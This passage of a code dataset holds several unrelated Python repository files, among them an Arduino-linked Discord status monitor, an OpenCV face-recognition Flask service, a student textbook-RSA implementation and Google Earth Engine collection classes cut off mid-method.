10 = 10110 (final result for number 10125)\r\nPlot the numbers on the x axis and the corresponding resulting numbers on the y axis\r\n\"\"\"\r\n\r\ndef wisteria(x):\r\n    temp = x\r\n    product_of_digits = 1\r\n    while temp > 0:\r\n        rem = temp % 10\r\n        if rem == 0:\r\n            pass\r\n        else:\r\n            product_of_digits *= rem\r\n        temp //= 10\r\n    output = x - product_of_digits\r\n    return output\r\n\r\nx = np.arange(0, 500, 1)\r\ny = []\r\nprint('Please wait while we plot the graph...')\r\nfor i in x:\r\n    y.append(wisteria(i))\r\nprint('Done')\r\nplt.plot(x, y,'r+', linestyle = 'dotted', markeredgecolor = 
'blue')\r\nplt.title('Wisteria')\r\nplt.show()\r\n\r\n","repo_name":"sneaky-potato/matplotlib-projects","sub_path":"wisteria.py","file_name":"wisteria.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35059755362","text":"import os\nimport configparser\nimport sys\nimport threading\nimport time\nimport sched\nimport atexit\nfrom shutil import copyfile\n\nfrom pyfirmata import Arduino\nimport discord\nfrom ShiftOut import ShiftOut\nfrom Status import *\n\nimport SysTrayIcon\n\nREFRESH = 0.5\n\n\nclass DiscordMonitor:\n def __init__(self):\n self.client = discord.Client()\n\n # Extract data from config file\n self.config = configparser.ConfigParser()\n if not os.path.isfile(\"config.ini\"):\n copyfile(\"default.ini\", \"config.ini\")\n self.config.read(\"config.ini\")\n self.username = self.config['LoginInfo']['Email']\n self.password = self.config['LoginInfo']['Password']\n\n # Initialize Arduino\n comm = Arduino('COM3')\n latchPin = int(self.config['Pins']['latchPin'])\n clockPin = int(self.config['Pins']['clockPin'])\n dataPin = int(self.config['Pins']['dataPin'])\n self.monitor = ShiftOut(comm, dataPin, latchPin, clockPin)\n\n # Clear board\n self.monitor.ShiftOut(0x00)\n\n self.threads = {}\n\n # Schedule callback\n self.sched = sched.scheduler(time.time, time.sleep)\n self.sched.enter(REFRESH, 1, self.update)\n t_sched = threading.Thread(target=self.sched.run, daemon=True)\n t_sched.start()\n self.threads['t_sched'] = t_sched\n\n def run_tray_icon(): SysTrayIcon.SysTrayIcon('dm.ico', 'Discord Monitor', (), on_quit=lambda *_: self.exit())\n\n # Set up Tray Icon to keep other threads running\n # Exits when only daemon threads left\n t_tray = threading.Thread(target=run_tray_icon, daemon=False)\n t_tray.start()\n self.threads['t_tray'] = t_tray\n\n # Log into Discord\n self.login()\n\n def update(self):\n # Disconnected\n status = DISCONNECTED\n if self.client.is_logged_in:\n status |= CONNECTED\n for server in self.client.servers:\n member_id = server.get_member(self.client.user.id)\n member_voice = member_id.voice\n if member_voice is not None:\n if member_voice.deaf or member_voice.self_deaf:\n status |= DEAFENED\n break\n elif member_voice.mute or member_voice.self_mute:\n status |= MUTED\n break\n self.monitor.ShiftOut(status)\n self.sched.enter(REFRESH, 1, self.update)\n\n def login(self):\n print(\"Attempting to log in as {}...\".format(self.username))\n # Checks if script is already running\n if self.threads.get(\"t_client\"):\n print('Duplicate login')\n self.client.logout()\n t_client = threading.Thread(target=self.client.run, args=(self.username, self.password), daemon=True)\n t_client.start()\n self.threads['t_client'] = t_client\n\n def exit(self):\n print('Exiting...')\n sys.exit()\n\n\ndef main():\n monitor = DiscordMonitor()\n atexit.register(monitor.exit)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main()\n except:\n pass\n else:\n break\n","repo_name":"wwong7132/DiscordMonitor","sub_path":"DiscordMonitor.pyw","file_name":"DiscordMonitor.pyw","file_ext":"pyw","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71236704106","text":"import cv2\nimport numpy as np\nimport os\nfrom os import listdir\nfrom os import makedirs\nfrom os.path import isfile, join\n\n\nface_dirs= os.path.join(os.getcwd(),'faces')\nprint(face_dirs)\n\n\n#face_dirs= './faces/'\nface_classifier = 
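cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n# Added guard (sketch): CascadeClassifier does not raise on a missing file,\n# it just loads empty; empty() exposes that, so fail fast here.\nif face_classifier.empty():\n    raise IOError('failed to load haarcascade_frontalface_default.xml')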
\n\n# crop only the face region from the full image and return it\ndef face_extractor(img):\n    # convert to grayscale\n    gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    gray = np.array(gray,dtype='uint8')\n    # detect faces\n    faces = face_classifier.detectMultiScale(gray)\n    # return None when no face is found\n    # (detectMultiScale returns an empty sequence, so test its length\n    # instead of the broken identity check 'faces is ()')\n    if len(faces) == 0:\n        return None\n\n    for(x,y,w,h) in faces:\n        cropped_face = img[y:y+h, x:x+w]\n\n    return cropped_face\n\ndef face_detector(img, size=0.5):\n    gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    faces = face_classifier.detectMultiScale(gray)\n\n    if len(faces) == 0:\n        return img,[]\n\n    for(x,y,w,h) in faces:\n        cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,255),2)\n        roi = img[y:y+h,x:x+w]\n        roi = cv2.resize(roi,(200,200))\n\n    return img,roi\n\nfrom flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_cors import CORS\nfrom tensorflow.keras.models import load_model\nimport io\nimport time\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/face/train\" , methods=[\"GET\",'POST'])\ndef train_pictures():\n    num = request.form['data']\n    if not os.path.isdir(face_dirs+'/'+num):\n        os.makedirs(face_dirs+'/'+num, exist_ok=True)\n    cap = cv2.VideoCapture(0)\n\n    # counter for the saved images\n    count = 0\n\n    while True:\n        # grab a single frame from the camera\n        ret, frame = cap.read()\n        if face_extractor(frame) is not None:\n            count+=1\n            face = cv2.resize(face_extractor(frame),(200,200))\n            face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n\n            file_num_path = './faces/'+num+'/'+num+str(count)+'.jpg'\n            file_dirs = './faces/'+num+'/'\n            print(file_dirs)\n            cv2.imwrite(file_num_path,face)\n\n            cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n            cv2.imshow('Face Cropper',face)\n        else:\n            print(\"Face not Found\")\n            pass\n\n        if cv2.waitKey(1)==13 or count==50:\n            break\n    cap.release()\n    cv2.destroyAllWindows()\n    print(\"Collecting Samples Complete\")\n\n    # list the files in the faces folder\n    file_list = [file for file in os.listdir(file_dirs) if os.path.isfile(join(file_dirs,file))]\n    # print(file_list)\n    # labels matched to the training data\n    training_data,labels = [],[]\n\n    # loop over every file\n    for i,files in enumerate(file_list):\n        image_path = file_dirs + file_list[i]\n        # print(image_path)\n        # load the image\n        images = cv2.imread(image_path,cv2.IMREAD_GRAYSCALE)\n\n        # skip anything that is not a readable image\n        if images is None:\n            continue\n        # append the image to the training_data list as a byte array\n        training_data.append(np.asarray(images,dtype=np.uint8))\n        # append the counter value to the labels list\n        labels.append(i)\n\n    if len(labels) == 0:\n        print(\"There is no data to train\")\n        exit()\n\n    # convert labels to 32-bit integers\n    labels = np.asarray(labels, dtype=np.int32)\n    # create the model\n    model = cv2.face.LBPHFaceRecognizer_create()\n    # start training\n    model.train(np.asarray(training_data), np.asarray(labels))\n    model.save(num+\"face_model.yml\")\n    return \"face registration complete\"\n\n@app.route(\"/face/recognition\" , methods=[\"GET\",'POST'])\ndef recognition():\n    t_end = time.time()+15\n    num = request.form['data']\n    cap = cv2.VideoCapture(0)\n    model = cv2.face.LBPHFaceRecognizer_create()\n    model.read(num+\"face_model.yml\")\n    confidence = 0\n    lock_list=[]\n\n    while time.time()<=t_end:\n\n        ret, frame = cap.read()\n\n        image, face = face_detector(frame)\n\n        try:\n            face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n            result = model.predict(face)\n            # result[1] is the distance; the closer to 0, the more likely it is the enrolled user\n            if result[1] < 500:\n                confidence = int(100*(1-(result[1])/300))\n                display_string = str(confidence)+'% Confidence it is user'\n            cv2.putText(image,display_string,(100,120),cv2.FONT_HERSHEY_COMPLEX,1,(250,120,255),2)\n\n            if confidence >= 70:\n                cv2.putText(image, 
\"Unlocked\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Face Cropper',image)\n lock_list.append('Unlocked')\n\n else:\n cv2.putText(image,\"Locked\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,255),2)\n cv2.imshow('Face Cropper', image)\n\n except:\n cv2.putText(image,\"Face Not Found\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(255,0,0),2)\n cv2.imshow('Face Cropper', image)\n pass\n\n if cv2.waitKey(10)==13:\n break\n\n if confidence>=70:\n break\n\n lock_list.append('Locked')\n cap.release()\n cv2.destroyAllWindows()\n return lock_list[0]\n\n\n\n\nif __name__ == \"__main__\" :\n app.run(host=\"localhost\", port=\"9500\")\n","repo_name":"developer-yechan/Cognitive-Rehabilitation-Training-Service","sub_path":"src/main/python/model/face/faceRecognition.py","file_name":"faceRecognition.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23041962471","text":"from player_reader import PlayerReader\nfrom enum import Enum\n\nclass SortBy(Enum):\n POINTS = 1\n GOALS = 2\n ASSISTS = 3\n\ndef sort_by(player, sorting_method=SortBy.POINTS):\n if sorting_method == SortBy.GOALS:\n return player.goals\n elif sorting_method == SortBy.ASSISTS:\n return player.assists\n return player.points\n\nclass StatisticsService:\n def __init__(self, io):\n self.io = io\n self._players = self.io.get_players()\n\n def search(self, name):\n for player in self._players:\n if name in player.name:\n return player\n\n return None\n\n def team(self, team_name):\n players_of_team = filter(\n lambda player: player.team == team_name,\n self._players\n )\n\n return list(players_of_team)\n\n def top(self, how_many, sorting_method=SortBy.POINTS):\n \n sorted_players = sorted(\n self._players,\n reverse=True,\n key=lambda player:sort_by(player, sorting_method)\n )\n\n result = []\n i = 0\n while i < how_many:\n result.append(sorted_players[i])\n i += 1\n\n return result\n","repo_name":"brotholi/ohtu-palautusrepositorio","sub_path":"viikko1/nhl-statistics-1/src/statistics_service.py","file_name":"statistics_service.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22178079797","text":"from djongo import models\n\n# Create your models here.\n\nclass Blog(models.Model):\n name = models.CharField(max_length=100)\n tagline = models.TextField()\n class Meta:\n abstract = True\n\n\nclass Entry(models.Model):\n blog = models.EmbeddedField(model_container=Blog,)\n headline = models.CharField(max_length = 255)\n objects = models.DjongoManager()\n\n def __str__(self):\n return str(self.blog) + str(self.headline)","repo_name":"zhoukaisspu/django_mongo","sub_path":"mysite/polls/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41762721638","text":"import math\r\nimport random\r\n#choosing p and q atleast 10^200 big\r\nhexalphabet = \"0123456789ABCDEF\"\r\nalphabet = \"abcdefghijklmnopqrstuvwxyz\" #for p and q\r\nalphabet2 = \".,?! 
\\t\\n\\rabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"# encrpt decrypt\r\n\r\nkey1 = \"once the lord of light banished dark and all that stemmed from humanity and men assumed a fleeting form these are the roots of our world men are props on the stage of life and no matter how tender how exquisite a lie will remain a lie\"\r\nkey2 = \"the dragons shall never be forgotten we knights fought valiantly but for every one of them we lost three score of our own exhiliration pride hatred rage the dragons teased out our dearest emotions thou will understand one day at thy twilight old thoughts return in great waves of nostalgia\"\r\n#from base 10 in the book section ch4.2 algorithm 1. example 6\r\ndef tobase10(alphabet, s): #string to number\r\n\tvalue = 0\r\n\tfor c in s:\r\n\t\tif (c in alphabet):\r\n\t\t\tpos = alphabet.find(c)\r\n\t\t\tvalue *= len(alphabet)\r\n\t\t\tvalue += pos\r\n\treturn value\r\n\t#if(value <= 10**200):\r\n\t\t#print(\"the value was below 10**200, try again\")\r\n\t\t#return None\r\n\t#else:\r\n\t\t#value = value % 10**200\r\n\t\t#value = ToOddToPrime(value)\r\n\t\t#print(value)\r\n\t\t#return value\r\n\r\ndef frombase10(alphabet, num):\r\n\tz = []\r\n\tk = 0\r\n\ttemp = \"\"\r\n\twhile num != 0:\r\n\t\tz.append(num % len(alphabet))\r\n\t\t#print(z[k])\r\n\t\tnum = num//len(alphabet)\r\n\t\tk += 1\r\n\r\n\twhile k != 0:\r\n\t\ttemp += alphabet[z[k-1]]\r\n\t\tk -= 1\r\n\t#print (temp)\r\n\treturn temp\r\n\r\n\r\ndef ToOddToPrime(value):\r\n\twhile(value % 2 == 0):\r\n\t\tvalue += 1\r\n\t#print(\"value turned odd\")\r\n\twhile(isPrime(value) == False):\r\n\t\tvalue += 2\r\n\t#print(\"value turned prime\")\r\n\treturn value\r\n\r\ndef GCD(a,b):\r\n\tif (b > a):\r\n\t\treturn GCD(b,a)\r\n\tif (a % b == 0):\r\n\t\treturn b\r\n\treturn GCD(b, a%b)\r\n\r\ndef egcd(a, b):\r\n if a == 0:\r\n return (b, 0, 1)\r\n else:\r\n g, y, x = egcd(b % a, a)\r\n return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n g, x, y = egcd(a, m)\r\n if g != 1:\r\n raise Exception('modular inverse does not exist')\r\n else:\r\n return x % m\r\n\r\ndef generateKeys(Sp, Sq):\r\n\tp = tobase10(alphabet, Sp)\r\n\tq = tobase10(alphabet, Sq)\r\n\t#print(\"this is P before 10^200 \", p)\r\n\tif(p <= 10**200):\r\n\t \tprint(\"the value was below 10**200, try again\")\r\n\t \treturn None\r\n\telse:\r\n\t \tp = p % 10**200\r\n\t \tp = ToOddToPrime(p)\r\n\t \t#print(\"this is P after 10^200 \", p)\r\n\tif(q <= 10**200):\r\n\t \tprint(\"the value was below 10**200, try again\")\r\n\t \treturn None\r\n\telse:\r\n\t \tq = q % 10**200\r\n\t \tq = ToOddToPrime(q)\r\n\t \t#print(\"this is P after 10^200 \", p)\r\n\tn = p*q\r\n\tr = (p-1)*(q-1)\r\n\te = 10**398 + 1\r\n\twhile (GCD(r, e) != 1):\r\n\t\te += 2\r\n\td = modinv(e, r)\r\n\t#print(\"Public: \\n\", n, \"\\n\", e, \"\\n\")\r\n\t#save to a file Public.txt\r\n\tf = open(\"public.txt\", \"w\")\r\n\tf.write(str(n))\r\n\tf.write(\"\\n\")\r\n\tf.write(str(e))\r\n\tf.close()\r\n\r\n\t#print(\"Private: \\n\", n, \"\\n\", d, \"\\n\")\r\n\t#save to a file Private.txt\r\n\tf = open(\"private.txt\", \"w\")\r\n\tf.write(str(n))\r\n\tf.write(\"\\n\")\r\n\tf.write(str(d))\r\n\tf.close()\r\n\t#print(\"d*e%r is\",d*e%r)\r\n\r\ndef Encrypt(inputFile, outputFile):\r\n\tfin = open(inputFile,\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tn = 0\r\n\te = 0\r\n\tfin = open(\"public.txt\",\"rb\")\r\n\tpublicTextBinary = fin.readlines()\r\n\tfin.close()\r\n\tfor x in 
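range(len(publicTextBinary)): # public.txt layout (written by generateKeys): line 1 = n, line 2 = e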
\r\n\t\ttemp = publicTextBinary[x].decode(\"utf-8\")\r\n\t\ttemp = temp.strip() # the original bare temp.strip(\"\\n\") discarded its result\r\n\t\tif(x == 0):\r\n\t\t\tn = int(temp)\r\n\t\telse:\r\n\t\t\te = int(temp)\r\n\r\n\t#print(n)\r\n\t#print(e)\r\n\tf = open(outputFile, \"wb\")\r\n\t#Convert the resulting integers back to the base 70 alphabet (from base 10)\r\n\tblocks = (len(PlainText) - 1) // 215 + 1 # ceil of len/215; was / 216, which could drop the final partial block\r\n\tsubBlocks = [] #Treat the input file text as a base 70 integer, 215 chars per block\r\n\r\n\tstart = 0\r\n\tend = 215\r\n\tincrement = 215\r\n\t#print(\"PlainText: \\n\",PlainText)\r\n\t#print(blocks)\r\n\tfor i in range(blocks): \t\t\t\t\t\t\t\t#for each block \r\n\t\t#print(\"start:\", start)\r\n\t\t#print(\"end\", end)\r\n\t\tsubBlocks.append(PlainText[start:end])\r\n\t\t#print(len(subBlocks))\r\n\t\t#print(subBlocks[i], \"\\n\") \t\t\t\t#grab the 215 chars\r\n\t\tM = tobase10(alphabet2, subBlocks[i])\r\n\t\t#print(M)\r\n\t\tif(M > n):\t\t\t\t\t\t\t\t#make sure the value is less than n\r\n\t\t\tprint(\"error the sub block was greater than N\")\r\n\t\t\treturn None\r\n\t\tE = pow(M,e,n) \t\t\t\t\t#Encode each block using the rules of RSA. m^e%n\r\n\t\t#print(E)\r\n\t\tEtext = frombase10(alphabet2, E)#Convert the resulting integer back to the base 70 alphabet (from base 10)\r\n\t\tEtext += \"$\"\r\n\t\t#print(Etext)\r\n\t\ttemp = Etext.encode(\"utf-8\")\r\n\t\tf.write(temp)\r\n\t\tstart += increment\r\n\t\tend += increment\r\n\tf.close()\r\n\r\n\t#and write to the output file. Put a $ after each block to indicate where each block ends. \r\n\t#Note that the output file should also be opened in binary mode, so to write text to it, \r\n\t#the text must first be converted to binary as follows:\r\n\t#fout.write( stringMessage.encode(\"utf-8\") )\r\n\r\ndef Decrypt(inputFile, outputFile):\r\n\tfin = open(inputFile,\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\tsubBlocks = PlainText.split(\"$\")\r\n\t#print(subBlocks)\r\n\r\n\tn = 0\r\n\td = 0\r\n\tfin = open(\"private.txt\",\"rb\")\r\n\tprivateTextBinary = fin.readlines()\r\n\tfin.close()\r\n\tfor x in range(len(privateTextBinary)): # private.txt layout: line 1 = n, line 2 = d\r\n\t\ttemp = privateTextBinary[x].decode(\"utf-8\")\r\n\t\ttemp = temp.strip() # same strip fix as in Encrypt\r\n\t\tif(x == 0):\r\n\t\t\tn = int(temp)\r\n\t\t\t#print (n)\r\n\t\telse:\r\n\t\t\td = int(temp)\r\n\t\t\t#print(d)\r\n\r\n\tf = open(outputFile, \"wb\")\r\n\tfor i in range(len(subBlocks)):\r\n\t\t#print(\"---------------------------\\n\")\r\n\t\t#print(subBlocks[i])\r\n\t\tE = tobase10(alphabet2, subBlocks[i])\r\n\t\t#print (E)\r\n\t\tD = pow(E,d,n)\r\n\t\t#print(D)\r\n\t\tM = frombase10(alphabet2, D)\r\n\t\t#print(M)\r\n\t\ttemp = M.encode(\"utf-8\")\r\n\t\tf.write(temp)\r\n\tf.close()\r\n\t#Use the same alphabet as above.\r\n\r\n\t#Treat the input file text as a base 70 integer, \r\n\t#and convert it to base 10, using block sizes as indicated by the $ signs.\r\n\r\n\t#Decode each block using the rules of RSA. 
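(Read n and d from private.txt)\r\n\t# Toy check with tiny, hypothetical primes (for intuition only; the real keys\r\n\t# are ~200-digit):\r\n\t#   p=61, q=53 -> n=3233, r=(p-1)*(q-1)=3120, e=17, d=modinv(17, 3120)=2753\r\n\t#   pow(pow(65, 17, 3233), 2753, 3233) == 65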
\r\n\r\n\t#Convert the resulting integers back to the base 70 alphabet, \r\n\t#and write to the output file, again converting to binary mode as explained above.\r\n\r\ndef MillersTest(N):\r\n\tb = random.randrange(2, N)\r\n\tT = N - 1\r\n\ts = 0\r\n\tfor i in range(N):\r\n\t\tif(T % 2 == 0):\r\n\t\t\ts += 1\r\n\t\t\tT = T//2\r\n\t\telse:\r\n\t\t\tbreak\r\n\r\n\tif (pow(b,T,N) == 1):\r\n\t\treturn True\r\n\r\n\tfor j in range(0,s):\r\n\t\tpower = (2**j)*T\r\n\t\tif (pow(b,power,N) == N - 1):\r\n\t\t\treturn True # 3/4 chance prime\r\n\r\n\treturn False # for sure composite\r\n\r\n\r\n\r\ndef isPrime(N):\r\n\tfor i in range(20):\r\n\t\tok = MillersTest(N)\r\n\t\tif(ok == False):\r\n\t\t\treturn False #composite\r\n\t\t\r\n\treturn True #almost surely prime\r\n\r\ndef main():\r\n\tgenerateKeys(key1, key2)\r\n\t#Make a plain text file consisting of only letters in the alphabet.\r\n\t#It should be long enough to require multiple encoding blocks.\r\n\t\r\n\t#Encrypt(\"plaintext.txt\",\"en_output.txt\")#Call your Encrypt method.\r\n\r\n\tDecrypt(\"BlakeEncrypted.txt\", \"de_output.txt\")#Call your Decrypt method.\r\n\r\n\t#Verify that the decoded output file exactly matches the original plain text file.\r\n\tfin = open(\"plaintext.txt\",\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tfin = open(\"de_output.txt\",\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tendText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tif(PlainText == endText):\r\n\t\tprint(\"The files match, congratulations\")\r\n\telse:\r\n\t\tprint(\"FAIL\")\r\n\t\tprint(\"this is plain text \\n\", PlainText)\r\n\t\tprint(\"this is endText \\n\", endText)\r\n\r\nmain()","repo_name":"Doctorhobo/RSA","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35300381243","text":"\"\"\"\r\nCreate a list of integers and build a new list with the elements that are divisible by 3.\r\n\"\"\"\r\nlista_div_tres = []\r\nlista_numeros = list(range(1, 51))\r\n\r\nfor numero in lista_numeros:\r\n    if numero % 3 == 0:\r\n        lista_div_tres.append(numero)\r\n\r\nprint(lista_numeros)\r\nprint('Numbers divisible by 3:')\r\nprint(f'{lista_div_tres}')","repo_name":"helton-barbosa/Python-3-Full","sub_path":"listas/exercicio_10.py","file_name":"exercicio_10.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"718607487","text":"#\n# \n#\nimport numbers\nimport ee\nimport geeutils\nimport geebiopar\nimport geemask\n\n\n\"\"\"\n\"\"\"\nclass IProjectable(object):\n    \"\"\"\n    By default, Earth Engine performs nearest neighbor resampling during reprojection.\n    \n    used in GEECol.getcollection (reproject to align pixel boundaries of the product with reference roi)\n    \"\"\"\n    def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n        \"\"\"\n        depending on the nature of the (images in) the collection,\n        reprojecting (to larger pixels) will be done by averaging (ordinal images),\n        selecting the median (categorical images) or by a specific algorithm (e.g. log scaled images).\n\n        TODO: check that these reductions reduce to nop in case native projection.nominalScale > target projection.nominalScale\n        TODO: check that median uses existing values only - nope. doesn't work. 
switching to 'mode'\n TODO: should we split ordinal images further into mean, median, ... ? S1 will always be UserProjectable, but what with rgb's?\n \"\"\"\n #\n # default implementation might be nearest neighbor\n #\n # return (eeimagecollection\n # .map(lambda image: image.reproject(eeprojection)))\n #\n # but we prefer to avoid defaults as far as possible\n #\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n\n\"\"\"\n\"\"\"\nclass UserProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n to be implemented by daughter\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n\n\"\"\"\n\"\"\"\nclass CategoricalProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n reproject categorical collection \n - using mode because that is what we want\n - unweighted to avoid 'float' values due to fractional pixel selections\n \n remark: \n - in case a categorical image is down sampled considerably, mode is a far better method than nearest neighbor\n - in case a categorical image is down sampled nominally, mode acts as a smoother, whereas nearest neighbor can introduce pixel shifts\n - bottom line: no silver bullet\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}._reproject - using Reducer.mode() - {geeutils.szprojectioninfo(eeprojection)}\")\n def reproject(image):\n return (image\n .reduceResolution(ee.Reducer.mode().unweighted(), maxPixels=4096)\n .reproject(eeprojection))\n \n eeimagecollection = eeimagecollection.map(reproject)\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass OrdinalProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n reproject ordinal collection - using mean\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}._reproject - using Reducer.mean() - {geeutils.szprojectioninfo(eeprojection)}\")\n def reproject(image):\n return (image\n .reduceResolution(ee.Reducer.mean(), maxPixels=4096)\n .reproject(eeprojection))\n \n eeimagecollection = eeimagecollection.map(reproject)\n return eeimagecollection\n\n\n###############################################################################\n#\n# products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass GEECol(object):\n \"\"\"\n The 'GEECol' class represents specific ('product') collections of images. The class contains the information and algorithms\n needed to retrieve data from gee and calculate, convert... this data into the desired products for the specified region (roi).\n e.g. some ndvi-GEEProduct class should be able to collect the NIR and RED data for a specific sensor from gee,\n and apply some normalizedDifference algorithm on this data.\n \n The resulting products are expected to be exported eventually as timeseries for the specified roi.\n - In case of overlapping images -e.g. overlap of Sentinel 2 tiles- multiple images with identical\n timestamps can cover identical points.\n - In other cases -e.g. 
Sentinel 1- multiple images can cover different parts of the specified roi\n shortly after each other.\n To avoid these ambiguities in the product collections, images contributing to the specified roi\n are composited/mosaiced over daily intervals (probably thereby introducing more problems than solving).\n\n Until further notice we'll focus on \n - single-band (output) products\n - with minimum periodicity of 1 day\n\n GEECol <---+--- GEECol_s2ndvi\n +--- GEECol_s2fapar\n +--- GEECol_s2scl\n +--- GEECol_s2sclsimplemask\n +--- GEECol_s2sclconvmask\n +--- GEECol_s2sclcombimask\n +--- GEECol_s2sclclassfractions (test: one-image-collection)\n +--- GEECol_s2sclstaticsmask (test: one-image-collection)\n +--- GEECol_s2cloudlessmask (test: using S2_CLOUD_PROBABILITY)\n +--- GEECol_s2rgb (test)\n +--- GEECol_s1sigma0\n +--- GEECol_s1gamma0\n +--- GEECol_s1rvi (test)\n +--- GEECol_pv333ndvi\n +--- GEECol_pv333sm\n +--- GEECol_pv333simplemask\n +--- GEECol_pv333rgb\n +--- ...\n \"\"\"\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n - selects the ee.ImageCollection(s) needed to create the product\n - filters the collections to the specified roi and dates range\n - applies the product specific algorithm (e.g.: ndvi = (nir-red)/(nir+red))\n - applies mosaicing/compositing if needed:\n - e.g. in case of collections with tiled images where a roi intersects with multiple tiles (Sentinel-1)\n - e.g. in case of collections with overlapping images where points in the roi have multiple values (Sentinel-2)\n - uses a mosaicing/compositing algorithm type appropriate to the product (e.g.: ndvi and fapar typically 'max' composite)\n - assumes a minimum periodicity of 1 day for the output product, hence mosaicing/compositing is applied on images of the same date yyyymmdd\n - add collection properties describing this collection ('gee_description')\n - returns the product as single band ee.Imagecollection with distinct dates (excluding testcases and experiments)\n\n :param eeroi: ee.Geometry describing the region of interest (typically an ee.Geometry.Point or a ('square') ee.Geometry.Polygon)\n :param eedatefrom: ee.Date - earliest date included in the product\n :param eedatetill: ee.Date - earliest date NOT-included in the product\n :returns: ee.ImageCollection\n \"\"\"\n #\n # to be implemented by daughter\n #\n raise NotImplementedError(f\"{str(type(self).__name__)} - Subclasses should implement 'collect'!\")\n\n\n def scaleandflag(self, geecolimagecollection, verbose=False):\n \"\"\"\n scale, clamp, cast, ... : format the collection to be exported\n \n in case this product will be exported to file, this is recommended, otherwise masked areas\n will be exported as 0 (Export.image.toDrive) or -1 (Image.getDownloadUrl)\n regardless of its content (at least that is what we see now; ee version 0.1.248)\n \n in most normal cases - the GEEColl fully specified in its collect(...) - this should be done\n \n in special cases this might be avoided or postponed. \n e.g. 
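a plain max composite, sketched here on the assumption that 'col' is\n        the collection returned by collect() and 'd0' an ee.Date:\n\n            weekfilter = ee.Filter.date(d0, d0.advance(1, 'week'))\n            weekmax = col.filter(weekfilter).max()  # per-pixel max, still unscaled\n\n        e.g. 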
when we want temporal max composite of an ndvi collection,\n in case no scaleandflag is applied, this can be done straight forward by filtering \n the collection into date ranges, and apply the max reducer (ee.ImageCollection.max())\n\n :param geecolimagecollection: ee.ImageCollection obtained from GEECol.collect\n :returns: ee.ImageCollection\n \"\"\"\n #\n # to be implemented by daughter\n #\n raise NotImplementedError(f\"{str(type(self).__name__)} - Subclasses should implement 'scaleandflag!'\")\n\n\n def getcollection(self, eedatefrom, eedatetill, eepoint, roipixelsindiameter, refcollection=None, refroipixelsdiameter=None, doscaleandflag=True, verbose=False):\n \"\"\"\n wrap _getcollection to allow some retries to avoid sporadic \"ee.ee_exception.EEException: Computation timed out.\"\n \"\"\"\n try:\n return geeutils.wrapretry(\n self._getcollection, \n args=(eedatefrom, eedatetill, eepoint, roipixelsindiameter),\n kwargs={'refcollection':refcollection, 'refroipixelsdiameter':refroipixelsdiameter, 'doscaleandflag':doscaleandflag, 'verbose':verbose},\n attempts=8, backoffseconds=60, backofffactor=2, verbose=verbose) # max 1 + 2 + ... + 64 = 127 minutes\n except geeutils.NoRetryException as e:\n #\n # arriving here is expected to indicate that some problem was explicitly caught\n # and classified as being not-solvable by retries, e.g. attempt to collect data\n # which does not exist in requested period or region.\n # we'll return 'None', so client can handle as some empty collection.\n #\n return None\n except:\n #\n # arriving here means we reached the limit of retries/backoffs. this could be caused\n # by some bug, or due to some service or resource not being available (even after \n # specified retries and backoffs). hence we can only pass the exception to the client\n #\n raise\n\n def _getcollection(self, eedatefrom, eedatetill, eepoint, roipixelsindiameter, refcollection=None, refroipixelsdiameter=None, doscaleandflag=True, verbose=False):\n \"\"\"\n determine reference roi (to obtain product patches 